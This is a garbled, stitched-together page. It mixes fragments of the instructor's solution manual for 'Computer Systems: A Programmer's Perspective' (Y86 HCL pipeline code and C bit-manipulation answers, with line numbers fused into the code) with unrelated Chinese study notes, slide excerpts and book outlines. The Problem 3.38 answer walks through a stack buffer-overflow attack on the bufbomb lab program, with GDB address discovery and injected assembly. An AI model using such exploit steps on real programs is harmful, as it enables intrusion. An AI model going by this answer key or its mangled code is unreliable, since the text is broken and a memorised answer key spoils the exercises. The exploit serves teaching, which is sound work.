srcA=[99icode in{IRRMOVL,IRMMOVL,IOPL,IPUSHL}:rA;20CHAPTER1.SOLUTIONS TO HOMEWORK PROBLEMS 101icode in{IPOPL,IRET}:RESP;1021:RNONE;#Don’t need register103];104105##What register should be used as the B source?106int srcB=[107icode in{IOPL,IRMMOVL,IMRMOVL}:rB;108icode in{IIADDL}:rB;109icode in{IPUSHL,IPOPL,ICALL,IRET}:RESP;110icode in{ILEAVE}:REBP;1111:RNONE;#Don’t need register112];113114##What register should be used as the E destination?115int dstE=[116icode in{IRRMOVL,IIRMOVL,IOPL}:rB;117icode in{IIADDL}:rB;118icode in{IPUSHL,IPOPL,ICALL,IRET}:RESP;119icode in{ILEAVE}:RESP;1201:RNONE;#Don’t need register121];122123##What register should be used as the M destination?124int dstM=[125icode in{IMRMOVL,IPOPL}:rA;126icode in{ILEAVE}:REBP;1271:RNONE;#Don’t need register128];129130################Execute Stage###################################131132##Select input A to ALU133int aluA=[134icode in{IRRMOVL,IOPL}:valA;135icode in{IIRMOVL,IRMMOVL,IMRMOVL}:valC;136icode in{IIADDL}:valC;137icode in{ICALL,IPUSHL}:-4;138icode in{IRET,IPOPL}:4;139icode in{ILEAVE}:4;140#Other instructions don’t need ALU141];142143##Select input B to ALU144int aluB=[145icode in{IRMMOVL,IMRMOVL,IOPL,ICALL,146IPUSHL,IRET,IPOPL}:valB;147icode in{IIADDL,ILEAVE}:valB;148icode in{IRRMOVL,IIRMOVL}:0;149#Other instructions don’t need ALU1.4.CHAPTER4:PROCESSOR ARCHITECTURE21151152##Set the ALU function153int alufun=[154icode==IOPL:ifun;1551:ALUADD;156];157158##Should the condition codes be updated?159bool set_cc=icode in{IOPL,IIADDL};160161################Memory Stage###################################162163##Set read control signal164bool mem_read=icode in{IMRMOVL,IPOPL,IRET,ILEAVE};165166##Set write control signal167bool mem_write=icode in{IRMMOVL,IPUSHL,ICALL};168169##Select memory address170int mem_addr=[171icode in{IRMMOVL,IPUSHL,ICALL,IMRMOVL}:valE;172icode in{IPOPL,IRET}:valA;173icode in{ILEAVE}:valA;174#Other instructions don’t need address175];176177##Select memory input data178int mem_data=[179#Value from register180icode in{IRMMOVL,IPUSHL}:valA;181#Return PC182icode==ICALL:valP;183#Default:Don’t write anything184];185186################Program Counter Update############################187188##What address should instruction be fetched at189190int new_pc=[191#e instruction constant192icode==ICALL:valC;193#Taken e instruction constant194icode==IJXX&&Bch:valC;195#Completion of RET e value from stack196icode==IRET:valM;197#Default:Use incremented PC1981:valP;199];22CHAPTER 1.SOLUTIONS TO HOMEWORK PROBLEMSME DMispredictE DM E DM M E D E DMGen./use 1W E DM Gen./use 2WE DM Gen./use 3W Figure 1.1:Pipeline states for special control conditions.The pairs connected by arrows can arisesimultaneously.code/arch/pipe-nobypass-ans.hcl1.4.CHAPTER4:PROCESSOR ARCHITECTURE232#At most one of these can be true.3bool F_bubble=0;4bool F_stall=5#Stall if either operand source is destination of6#instruction in execute,memory,or write-back stages7d_srcA!=RNONE&&d_srcA in8{E_dstM,E_dstE,M_dstM,M_dstE,W_dstM,W_dstE}||9d_srcB!=RNONE&&d_srcB in10{E_dstM,E_dstE,M_dstM,M_dstE,W_dstM,W_dstE}||11#Stalling at fetch while ret passes through pipeline12IRET in{D_icode,E_icode,M_icode};1314#Should I stall or inject a bubble into Pipeline Register D?15#At most one of these can be true.16bool D_stall=17#Stall if either operand source is destination of18#instruction in execute,memory,or write-back stages19#but not part of mispredicted branch20!(E_icode==IJXX&&!e_Bch)&&21(d_srcA!=RNONE&&d_srcA in22{E_dstM,E_dstE,M_dstM,M_dstE,W_dstM,W_dstE}||23d_srcB!=RNONE&&d_srcB in24{E_dstM,E_dstE,M_dstM,M_dstE,W_dstM,W_dstE});2526bool D_bubble=27#Mispredicted branch28(E_icode==IJXX&&!e_Bch)||29#Stalling at fetch while ret passes through pipeline30!(E_icode in{IMRMOVL,IPOPL}&&E_dstM in{d_srcA,d_srcB})&&31#but not condition for a generate/use hazard32!(d_srcA!=RNONE&&d_srcA in33{E_dstM,E_dstE,M_dstM,M_dstE,W_dstM,W_dstE}||34d_srcB!=RNONE&&d_srcB in35{E_dstM,E_dstE,M_dstM,M_dstE,W_dstM,W_dstE})&&36IRET in{D_icode,E_icode,M_icode};3738#Should I stall or inject a bubble into Pipeline Register E?39#At most one of these can be true.40bool E_stall=0;41bool E_bubble=42#Mispredicted branch43(E_icode==IJXX&&!e_Bch)||44#Inject bubble if either operand source is destination of45#instruction in execute,memory,or write back stages46d_srcA!=RNONE&&47d_srcA in{E_dstM,E_dstE,M_dstM,M_dstE,W_dstM,W_dstE}|| 48d_srcB!=RNONE&&49d_srcB in{E_dstM,E_dstE,M_dstM,M_dstE,W_dstM,W_dstE};5024CHAPTER1.SOLUTIONS TO HOMEWORK PROBLEMS 52#At most one of these can be true.53bool M_stall=0;54bool M_bubble=0;code/arch/pipe-full-ans.hcl 1####################################################################2#HCL Description of Control for Pipelined Y86Processor#3#Copyright(C)Randal E.Bryant,David R.O’Hallaron,2002#4####################################################################56##This is the solution for the iaddl and leave problems78####################################################################9#C Include’s.Don’t alter these#10#################################################################### 1112quote’#include<stdio.h>’13quote’#include"isa.h"’14quote’#include"pipeline.h"’15quote’#include"stages.h"’16quote’#include"sim.h"’17quote’int sim_main(int argc,char*argv[]);’18quote’int main(int argc,char*argv[]){return sim_main(argc,argv);}’1920####################################################################21#Declarations.Do not change/remove/delete any of these#22#################################################################### 2324#####Symbolic representation of Y86Instruction Codes#############25intsig INOP’I_NOP’26intsig IHALT’I_HALT’27intsig IRRMOVL’I_RRMOVL’28intsig IIRMOVL’I_IRMOVL’29intsig IRMMOVL’I_RMMOVL’30intsig IMRMOVL’I_MRMOVL’31intsig IOPL’I_ALU’32intsig IJXX’I_JMP’33intsig ICALL’I_CALL’34intsig IRET’I_RET’1.4.CHAPTER4:PROCESSOR ARCHITECTURE25 36intsig IPOPL’I_POPL’37#Instruction code for iaddl instruction38intsig IIADDL’I_IADDL’39#Instruction code for leave instruction40intsig ILEAVE’I_LEAVE’4142#####Symbolic representation of Y86Registers referenced explicitly##### 43intsig RESP’REG_ESP’#Stack Pointer44intsig REBP’REG_EBP’#Frame Pointer45intsig RNONE’REG_NONE’#Special value indicating"no register"4647#####ALU Functions referenced explicitly##########################48intsig ALUADD’A_ADD’#ALU should add its arguments4950#####Signals that can be referenced by control logic##############5152#####Pipeline Register F##########################################5354intsig F_predPC’pc_curr->pc’#Predicted value of PC5556#####Intermediate Values in Fetch Stage###########################5758intsig f_icode’if_id_next->icode’#Fetched instruction code59intsig f_ifun’if_id_next->ifun’#Fetched instruction function60intsig f_valC’if_id_next->valc’#Constant data of fetched instruction 61intsig f_valP’if_id_next->valp’#Address of following instruction 6263#####Pipeline Register D##########################################64intsig D_icode’if_id_curr->icode’#Instruction code65intsig D_rA’if_id_curr->ra’#rA field from instruction66intsig D_rB’if_id_curr->rb’#rB field from instruction67intsig D_valP’if_id_curr->valp’#Incremented PC6869#####Intermediate Values in Decode Stage#########################7071intsig d_srcA’id_ex_next->srca’#srcA from decoded instruction72intsig d_srcB’id_ex_next->srcb’#srcB from decoded instruction73intsig d_rvalA’d_regvala’#valA read from register file74intsig d_rvalB’d_regvalb’#valB read from register file 7576#####Pipeline Register E##########################################77intsig E_icode’id_ex_curr->icode’#Instruction code78intsig E_ifun’id_ex_curr->ifun’#Instruction function79intsig E_valC’id_ex_curr->valc’#Constant data80intsig E_srcA’id_ex_curr->srca’#Source A register ID81intsig E_valA’id_ex_curr->vala’#Source A value82intsig E_srcB’id_ex_curr->srcb’#Source B register ID83intsig E_valB’id_ex_curr->valb’#Source B value84intsig E_dstE’id_ex_curr->deste’#Destination E register ID。

深入理解计算机系统答案【篇一:深入理解计算机系统笔记】(1)对于一个无符号数字 x, 截断它到 k 位的结果就相当于计算 x mod 2^k.(2)在大多数的机器上 ,整数乘法指令相当地慢 ,需要 12 或者更多的始终周期 ,然而其他整数运算-例如加法、减法、位移运算和移位-只需要 1 个时钟周期 .因此 ,编译器使用的一项重要的优化就是试着使用移位和加法运算的组合来代替乘以常数因子的乘法.(3)在大多数的机器上 ,整数除法要比整数乘法更慢-需要 30 或者更多的始终周期 .除以 2 的幂也可以用移位运算来实现 ,只不过我们用的是右移 ,而不是左移 .对于无符号和二进制补码数 ,分别使用逻辑移位和算术移位来达到目的 .1. 注意系统的分类:主流的 ia32( 也就是 x86) ,以及 x86-64( 也就是x64) ,还有种 intel 的与原 32 位系统不兼容的 ia64 。
2. 编译系统由预处理器,编译器,汇编器和链接器组成。
3.单指令多数据并行称为 simd 并行,其扩展为 sse 指令集。
4.x64 上 long 为 8 字节,指针也为 8 字节。
7.short 转为 unsigned 时,是先扩展大小再符号转换。
8. 补码非的计算:从左到右将第一个为 1 的位前的所有位取反。
12.预处理器扩展源代码,然后编译器生成源代码的文本汇编代码,汇编器转成二进制汇编码,链接器生成exe 或 dll 或 lib 。
注意汇编中的加括号表示为取该地址指向的值,如 (%eax) 指 %eax 中保存的地址指向的值。

14. 设相对寻址的转移指令占两个 字节,第一个字节是操作码,第二个 字节是相对位移量,用补码表示。假 设当前转移指令第一字节所在的地址 为2000H,且CPU每取出一个字节便自 动完成(PC)+1PC的操作。试问当 执行“JMP *+8”和“JMP *-9”指令时, 转移指令第二字节的内容各为多少?
第 8 张幻灯片
11. 画出先变址再间址及先间址再变址的寻址过程 示意图。
解:1)先变址再间址寻址过程简单示意如下: 目 录 EA=[(IX)+A], (IX)+1IX
上一页 IR OP M
+1 退 出 IX
主存 操作数
IX:变址寄存器, 既可是专用寄存器, 也可是通用寄存器之一。
第 19 张幻灯片
上一页 下一页 退出
(6)六种寻址方式中,立即寻址指 令执行时间最短,因为此时不需寻址;
间接寻址指令执行时间最长,因为 寻址操作需访存一次到多次;
操作数位置可随程序存储区的变动而改 变,总是相对于程序一段距离;
为此时变址值可自动修改而不需要修改 程序。
EA =(PR)‖A (有效地址=页面地址“拼接”6位形式地址)
第 24 张幻灯片
上一页 下一页 退出
通过基址寻址与段寻址获得实际地 址的区别:
1)基址寻址的基地址一般比较长 (存储器地址位数),位移量比较短 (=形式地址位数),相加后得到的有效 地址长度=基地址长度。此时主存不分段。
EA1= (PC) +8 = 2002H+0008H = 200AH

深⼊理解计算机系统答案(超⾼清电⼦版)Computer Systems:A Programmer’s Perspective Instructor’s Solution Manual1Randal E.BryantDavid R.O’HallaronDecember4,20032Chapter1Solutions to Homework ProblemsThe text uses two different kinds of exercises:Practice Problems.These are problems that are incorporated directly into the text,with explanatory solutions at the end of each chapter.Our intention is that students will work on these problems as they read the book.Each one highlights some particular concept.Homework Problems.These are found at the end of each chapter.They vary in complexity from simple drills to multi-week labs and are designed for instructors to give as assignments or to use as recitation examples.This document gives the solutions to the homework problems.1.1Chapter1:A Tour of Computer Systems1.2Chapter2:Representing and Manipulating InformationProblem2.40Solution:This exercise should be a straightforward variation on the existing code.2CHAPTER1.SOLUTIONS TO HOMEWORK PROBLEMS1011void show_double(double x)12{13show_bytes((byte_pointer)&x,sizeof(double));14}code/data/show-ans.c 1int is_little_endian(void)3/*MSB=0,LSB=1*/4int x=1;56/*Return MSB when big-endian,LSB when little-endian*/7return(int)(*(char*)&x);8}1.2.CHAPTER2:REPRESENTING AND MANIPULATING INFORMATION3 There are many solutions to this problem,but it is a little bit tricky to write one that works for any word size.Here is our solution:code/data/shift-ans.c The above code peforms a right shift of a word in which all bits are set to1.If the shift is arithmetic,the resulting word will still have all bits set to1.Problem2.45Solution:This problem illustrates some of the challenges of writing portable code.The fact that1<<32yields0on some32-bit machines and1on others is common source of bugs.A.The C standard does not de?ne the effect of a shift by32of a32-bit datum.On the SPARC(andmany other machines),the expression x</doc/dde1f034f111f18583d05a59.html pute beyond_msb as2<<31.C.We cannot shift by more than15bits at a time,but we can compose multiple shifts to get thedesired effect.Thus,we can compute set_msb as2<<15<<15,and beyond_msb as set_msb<<1.Problem2.46Solution:This problem highlights the difference between zero extension and sign extension.It also provides an excuse to show an interesting trick that compilers often use to use shifting to perform masking and sign extension.A.The function does not perform any sign extension.For example,if we attempt to extract byte0fromword0xFF,we will get255,rather than.B.The following code uses a well-known trick for using shifts to isolate a particular range of bits and toperform sign extension at the same time.First,we perform a left shift so that the most signi?cant bit of the desired byte is at bit position31.Then we right shift by24,moving the byte into the proper position and peforming sign extension at the same time. 4CHAPTER1.SOLUTIONS TO HOMEWORK PROBLEMS 3int left=word<<((3-bytenum)<<3);4return left>>24;5}Problem2.48Solution:This problem lets students rework the proof that complement plus increment performs negation.We make use of the property that two’s complement addition is associative,commutative,and has additive/doc/dde1f034f111f18583d05a59.html ing C notation,if we de?ne y to be x-1,then we have?y+1equal to-y,and hence?y equals -y+1.Substituting gives the expression-(x-1)+1,which equals-x.Problem2.49Solution:This problem requires a fairly deep understanding of two’s complement arithmetic.Some machines only provide one form of multiplication,and hence the trick shown in the code here is actually required to perform that actual form.As seen in Equation2.16we have.The?nal term has no effect on the-bit representation of,but the middle term represents acode/data/uhp-ans.c Problem2.50Solution:1.2.CHAPTER2:REPRESENTING AND MANIPULATING INFORMATION5A.:x+(x<<2)B.:x+(x<<3)C.:(x<<4)-(x<<1)D.:(x<<3)-(x<<6)Problem2.51Solution:Bit patterns similar to these arise in many applications.Many programmers provide them directly in hex-adecimal,but it would be better if they could express them in more abstract ways.A..((1<B..((1<Problem2.52Solution:Byte extraction and insertion code is useful in many contexts.Being able to write this sort of code is an important skill to foster.code/data/rbyte-ans.c Problem2.53Solution:These problems are fairly tricky.They require generating masks based on the shift amounts.Shift value k equal to0must be handled as a special case,since otherwise we would be generating the mask by performing a left shift by32.6CHAPTER1.SOLUTIONS TO HOMEWORK PROBLEMS 1unsigned srl(unsigned x,int k)2{3/*Perform shift arithmetically*/4unsigned xsra=(int)x>>k;5/*Make mask of low order32-k bits*/6unsigned mask=k?((1<<(32-k))-1):?0;78return xsra&mask;9}code/data/rshift-ans.c 1int sra(int x,int k)2{3/*Perform shift logically*/4int xsrl=(unsigned)x>>k;5/*Make mask of high order k bits*/6unsigned mask=k??((1<<(32-k))-1):0;78return(x<0)?mask|xsrl:xsrl;1.2.CHAPTER2:REPRESENTING AND MANIPULATING INFORMATION7B.(a)For,we have,,code/data/?oatge-ans.c 1int float_ge(float x,float y)2{3unsigned ux=f2u(x);4unsigned uy=f2u(y);5unsigned sx=ux>>31;6unsigned sy=uy>>31;78return9(ux<<1==0&&uy<<1==0)||/*Both are zero*/10(!sx&&sy)||/*x>=0,y<0*/11(!sx&&!sy&&ux>=uy)||/*x>=0,y>=0*/12(sx&&sy&&ux<=uy);/*x<0,y<0*/13},8CHAPTER1.SOLUTIONS TO HOMEWORK PROBLEMS This exercise is of practical value,since Intel-compatible processors perform all of their arithmetic in ex-tended precision.It is interesting to see how adding a few more bits to the exponent greatly increases the range of values that can be represented.Description Extended precisionValueSmallest denorm.Largest norm.Problem2.59Solution:We have found that working through?oating point representations for small word sizes is very instructive. Problems such as this one help make the description of IEEE?oating point more concrete.Description8000Smallest value4700Largest denormalized———1.3.CHAPTER3:MACHINE LEVEL REPRESENTATION OF C PROGRAMS91/*Compute2**x*/2float fpwr2(int x){4unsigned exp,sig;5unsigned u;67if(x<-149){8/*Too small.Return0.0*/9exp=0;10sig=0;11}else if(x<-126){12/*Denormalized result*/13exp=0;14sig=1<<(x+149);15}else if(x<128){16/*Normalized result.*/17exp=x+127;18sig=0;19}else{20/*Too big.Return+oo*/21exp=255;22sig=0;23}24u=exp<<23|sig;25return u2f(u);26}10CHAPTER1.SOLUTIONS TO HOMEWORK PROBLEMS int decode2(int x,int y,int z){int t1=y-z;int t2=x*t1;int t3=(t1<<31)>>31;int t4=t3?t2;return t4;}Problem3.32Solution:This code example demonstrates one of the pedagogical challenges of using a compiler to generate assembly code examples.Seemingly insigni?cant changes in the C code can yield very different results.Of course, students will have to contend with this property as work with machine-generated assembly code anyhow. They will need to be able to decipher many different code patterns.This problem encourages them to think in abstract terms about one such pattern.1movl8(%ebp),%edx x2movl12(%ebp),%ecx y3movl%edx,%eax4subl%ecx,%eax result=x-y5cmpl%ecx,%edx Compare x:y6jge.L3if>=goto done:7movl%ecx,%eax8subl%edx,%eax result=y-x9.L3:done:A.When,it will compute?rst and then.When it just computes.B.The code for then-statement gets executed unconditionally.It then jumps over the code for else-statement if the test is false.C.then-statementt=test-expr;if(t)goto done;else-statementdone:D.The code in then-statement must not have any side effects,other than to set variables that are also set1.3.CHAPTER3:MACHINE LEVEL REPRESENTATION OF C PROGRAMS11Problem3.33Solution:This problem requires students to reason about the code fragments that implement the different branches of a switch statement.For this code,it also requires understanding different forms of pointer dereferencing.A.In line29,register%edx is copied to register%eax as the return value.From this,we can infer that%edx holds result.B.The original C code for the function is as follows:1/*Enumerated type creates set of constants numbered0and upward*/2typedef enum{MODE_A,MODE_B,MODE_C,MODE_D,MODE_E}mode_t;34int switch3(int*p1,int*p2,mode_t action)5{6int result=0;7switch(action){8case MODE_A:12case MODE_B:13*p2+=*p1;14result=*p2;15break;16case MODE_C:17*p2=15;18result=*p1;19break;20case MODE_D:21*p2=*p1;22/*Fall Through*/23case MODE_E:24result=17;25break;26default:27result=-1;28}29return result;30}Problem3.34Solution:This problem gives students practice analyzing disassembled code.The switch statement contains all the features one can imagine—cases with multiple labels,holes in the range of possible case values,and cases that fall through.12CHAPTER1.SOLUTIONS TO HOMEWORK PROBLEMS 1int switch_prob(int x)2{3int result=x;45switch(x){6case50:7case52:8result<<=2;9break;10case53:11result>>=2;15/*Fall through*/16case55:17result*=result;18/*Fall through*/19default:20result+=10;21}2223return result;24}code/asm/varprod-ans.c 1int var_prod_ele_opt(var_matrix A,var_matrix B,int i,int k,int n) 2{3int*Aptr=&A[i*n];4int*Bptr=&B[k];5int result=0;6int cnt=n;78if(n<=0)9return result;1011do{12result+=(*Aptr)*(*Bptr);13Aptr+=1;14Bptr+=n;1.3.CHAPTER3:MACHINE LEVEL REPRESENTATION OF C PROGRAMS13 16}while(cnt); 1718return result;19}code/asm/structprob-ans.c 1typedef struct{2int idx;3int x[4];4}a_struct;14CHAPTER1.SOLUTIONS TO HOMEWORK PROBLEMS 1/*Read input line and write it back*/ 2/*Code will work for any buffer size.Bigger is more time-efficient*/ 3#define BUFSIZE644void good_echo()5{6char buf[BUFSIZE];7int i;8while(1){9if(!fgets(buf,BUFSIZE,stdin))10return;/*End of file or error*/11/*Print characters in buffer*/12for(i=0;buf[i]&&buf[i]!=’\n’;i++)13if(putchar(buf[i])==EOF)14return;/*Error*/15if(buf[i]==’\n’){16/*Reached terminating newline*/17putchar(’\n’);18return;19}20}21}An alternative implementation is to use getchar to read the characters one at a time.Problem3.38Solution:Successfully mounting a buffer over?ow attack requires understanding many aspects of machine-level pro-grams.It is quite intriguing that by supplying a string to one function,we can alter the behavior of another function that should always return a? xed value.In assigning this problem,you should also give students a stern lecture about ethical computing practices and dispell any notion that hacking into systems is a desirable or even acceptable thing to do.Our solution starts by disassembling bufbomb,giving the following code for getbuf: 1080484f4:280484f4:55push%ebp380484f5:89e5mov%esp,%ebp480484f7:83ec18sub$0x18,%esp580484fa:83c4f4add$0xfffffff4,%esp680484fd:8d45f4lea0xfffffff4(%ebp),%eax78048500:50push%eax88048501:e86a ff ff ff call804847098048506:b801000000mov$0x1,%eax10804850b:89ec mov%ebp,%esp11804850d:5d pop%ebp12804850e:c3retWe can see on line6that the address of buf is12bytes below the saved value of%ebp,which is4bytes1.3.CHAPTER3:MACHINE LEVEL REPRESENTATION OF C PROGRAMS15 of%ebp,and the address of the start of the buffer.To determine the relevant values,we run GDB as follows:1.First,we set a breakpoint in getbuf and run the program to that point:(gdb)break getbuf(gdb)runComparing the stopping point to the disassembly,we see that it has already set up the stack frame.2.We get the value of buf by computing a value relative to%ebp:(gdb)print/x(%ebp+12)This gives0xbfffefbc.3.We?nd the saved value of register%ebp by dereferencing the current value of this register:(gdb)print/x*$ebpThis gives0xbfffefe8.4.We?nd the value of the return pointer on the stack,at offset4relative to%ebp:(gdb)print/x*((int*)$ebp+1)This gives0x8048528We can now put this information together to generate assembly code for our attack:1pushl$0x8048528Put correct return pointer back on stack2movl$0xdeadbeef,%eax Alter return value3ret Re-execute return4.align4Round up to125.long0xbfffefe8Saved value of%ebp6.long0xbfffefbc Location of buf7.long0x00000000PaddingNote that we have used the.align statement to get the assembler to insert enough extra bytes to use up twelve bytes for the code.We added an extra4bytes of0s at the end,because in some cases OBJDUMP would not generate the complete byte pattern for the data.These extra bytes(plus the termininating null byte)will over?ow into the stack frame for test,but they will not affect the program behavior. Assembling this code and disassembling the object code gives us the following:10:6828850408push$0x804852825:b8ef be ad de mov$0xdeadbeef,%eax3a:c3ret4b:90nop Byte inserted for alignment.5c:e8ef ff bf bc call0xbcc00000Invalid disassembly.611:ef out%eax,(%dx)Trying to diassemble712:ff(bad)data16CHAPTER1.SOLUTIONS TO HOMEWORK PROBLEMS From this we can read off the byte sequence:Problem3.39Solution:This problem is a variant on the asm examples in the text.The code is actually fairly simple.It relies on the fact that asm outputs can be arbitrary lvalues,and hence we can use dest[0]and dest[1]directly in the output list.code/asm/asmprobs-ans.c Problem3.40Solution:For this example,students essentially have to write the entire function in assembly.There is no(apparent) way to interface between the?oating point registers and the C code using extended asm.code/asm/fscale.c1.4.CHAPTER4:PROCESSOR ARCHITECTURE17 1.4Chapter4:Processor ArchitectureProblem4.32Solution:This problem makes students carefully examine the tables showing the computation stages for the different instructions.The steps for iaddl are a hybrid of those for irmovl and OPl.StageFetchrA:rB M PCvalP PCExecuteR rB valEPC updateleaveicode:ifun M PCDecodevalB RvalE valBMemoryWrite backR valMPC valPProblem4.34Solution:The following HCL code includes implementations of both the iaddl instruction and the leave instruc-tions.The implementations are fairly straightforward given the computation steps listed in the solutions to problems4.32and4.33.You can test the solutions using the test code in the ptest subdirectory.Make sure you use command line argument‘-i.’。

这是《编程卓越之道(卷1):深入理解计算机(第2版)》的读书笔记模板,可以替换为自己的精彩内容摘 录。
4.1浮点运 算简介
4.2 IEEE 浮点格式
4.6浮点数 异常
4.3规约形 式与非规约 形式
4.5特殊的 浮点值
4.2.1单精度浮点格式 4.2.2双精度浮点格式 4.2.3扩展精度浮点格式 4.2.4四精度浮点格式
4.7.1浮点表示形式 4.7.2浮点数的加减法 4.7.3浮点数的乘除法
12.5系统总线与数 据传输速率
12.8 I/O端口超时
12.9中断与轮询式 I/O
12.10保护模式操作 与设备驱动程序
12.3.1内存映射输入/输出 12.3.2 I/O映射输入/输出 12.3.3直接内存访问
12.5.1 PCI总线的性能 12.5.2 ISA总线的性能 12.5.3 AGP总线
3.1二进制和十六进 制数字的算术运算
3.3二进制数值和位 串的逻
3.6位字段和打包数 据
3.7数据的打包和解 包
3.1.1二进制加法 3.1.2二进制减法 3.1.3二进制乘法 3.1.4二进制除法
3.4.1使用AND运算判断位串中的一位 3.4.2使用AND运算判断多个位为零或非零 3.4.3比较二进制字符串中的多个位 3.4.4使用AND运算创建模n计数器

用于解决复杂的数学问题和模 拟实验,如天气预报、核爆炸 模拟等。
用于模拟人类智能行为,如语 音识别、图像识别等。
用于实现计算机之间的数据传 输和通信,如互联网、物联网 等。
控制计算机各部件协调工作,保证计算机按 照程序设定的步骤执行。
深入理解计算机系统 chapter
• 计算机系统概述 • 计算机硬件系统 • 计算机软件系统 • 计算机系统的工作原理 • 计算机系统的性能评价 • 计算机系统的安全与可靠性
包括中央处理器(CPU)、内存、输入输出设备 等,提供计算能力和数据存储。
将计算机处理后的结果转换为人类可读的形式,如显 示器、打印机、音响等。
连接输入/输出设备与计算机主机的桥梁,实现数据 的传输和控制。
提供计算机硬件与应用程序之间的接口, 控制和管理计算机的硬件及软件资源。
用于存储、检索、定义和管理大量数 据的软件,提供数据组织和访问的方